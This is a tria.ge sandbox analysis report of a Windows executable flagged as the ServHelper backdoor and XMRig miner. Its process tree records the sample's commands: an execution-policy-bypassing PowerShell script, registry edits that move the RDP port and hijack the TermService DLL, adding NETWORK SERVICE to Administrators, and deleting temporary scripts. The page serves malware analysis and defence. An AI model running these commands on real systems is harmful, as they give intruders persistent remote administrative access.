Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

cb3cc55156...69.exe

windows7_x64

1

cb3cc55156...69.exe

windows10_x64

10

Analysis

  • max time kernel
    95s
  • max time network
    120s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    10/10/2021, 11:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    cb3cc551561883ab8fc4fb6fc837a469.exe

  • Size

    4.0MB

  • MD5

    cb3cc551561883ab8fc4fb6fc837a469

  • SHA1

    f74ae6d243342099d3fa500cbc630f4a244a8d82

  • SHA256

    ee5d82cd5e61b518572b4415797ee407cff1d28a2e0b43a2baec7236c37695eb

  • SHA512

    b97782f7835949ec41da357cfba598936bc2542fa53c0c8da7f35168f4f0fe19158a5946a297dcc540b7ce0dda8aeacd06f69ac209bd562e58fb31924e8fd7d1

Score
10/10
servhelperxmrigbackdoorminerpersistencetrojan

Malware Config

Signatures

  • ServHelper

    ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.

    trojanbackdoorservhelper
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 8 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 63 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe
    "C:\Users\Admin\AppData\Local\Temp\cb3cc551561883ab8fc4fb6fc837a469.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
      2⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5v3nplro\5v3nplro.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1072
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D4.tmp" "c:\Users\Admin\AppData\Local\Temp\5v3nplro\CSCB864D1E737C475DBB2095527C87833.TMP"
          4⤵
            PID:1144
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3424
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1600
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4052
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:1548
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies registry key
            PID:3632
          • C:\Windows\SysWOW64\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3200
            • C:\Windows\SysWOW64\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:408
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:2488
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3312
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2344
                  • C:\Windows\SysWOW64\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1756
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:2328
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1744
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2000
                    • C:\Windows\SysWOW64\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4020
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:1936
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:1840
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:2380

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • memory/1572-134-0x0000000008300000-0x0000000008301000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-128-0x0000000003540000-0x0000000003541000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-130-0x0000000007870000-0x0000000007871000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-131-0x0000000007F00000-0x0000000007F01000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-132-0x00000000080A0000-0x00000000080A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-177-0x0000000009A70000-0x0000000009A71000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-135-0x0000000008180000-0x0000000008181000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-136-0x00000000086D0000-0x00000000086D1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-138-0x0000000004E62000-0x0000000004E63000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-137-0x0000000004E60000-0x0000000004E61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-139-0x0000000008930000-0x0000000008931000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-156-0x0000000004E63000-0x0000000004E64000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-141-0x0000000003540000-0x0000000003541000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-145-0x0000000009CF0000-0x0000000009CF1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-146-0x00000000096A0000-0x00000000096A1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-127-0x0000000003540000-0x0000000003541000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-154-0x00000000074C0000-0x00000000074C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-1128-0x000000007E230000-0x000000007E231000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1572-129-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1600-444-0x00000000066C0000-0x00000000066C1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1600-445-0x00000000066C2000-0x00000000066C3000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/1600-542-0x000000007E930000-0x000000007E931000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-124-0x0000000007A00000-0x0000000007A01000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-123-0x0000000005E90000-0x0000000005E91000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-125-0x00000000054F4000-0x00000000054F5000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-115-0x0000000000D60000-0x0000000000D61000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-121-0x0000000006200000-0x0000000006201000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-122-0x0000000005EA0000-0x0000000005EA1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-120-0x00000000054F3000-0x00000000054F4000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-119-0x00000000054F2000-0x00000000054F3000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-118-0x00000000054F0000-0x00000000054F1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/2524-117-0x0000000005900000-0x0000000005CFF000-memory.dmp

                    Filesize

                    4.0MB

                    Download

                  • memory/3424-214-0x000000007F990000-0x000000007F991000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-192-0x0000000003280000-0x0000000003281000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-184-0x0000000007252000-0x0000000007253000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-182-0x0000000007250000-0x0000000007251000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-179-0x0000000003280000-0x0000000003281000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/3424-180-0x0000000003280000-0x0000000003281000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4052-698-0x0000000006A22000-0x0000000006A23000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4052-777-0x000000007E3E0000-0x000000007E3E1000-memory.dmp

                    Filesize

                    4KB

                    Download

                  • memory/4052-697-0x0000000006A20000-0x0000000006A21000-memory.dmp

                    Filesize

                    4KB

                    Download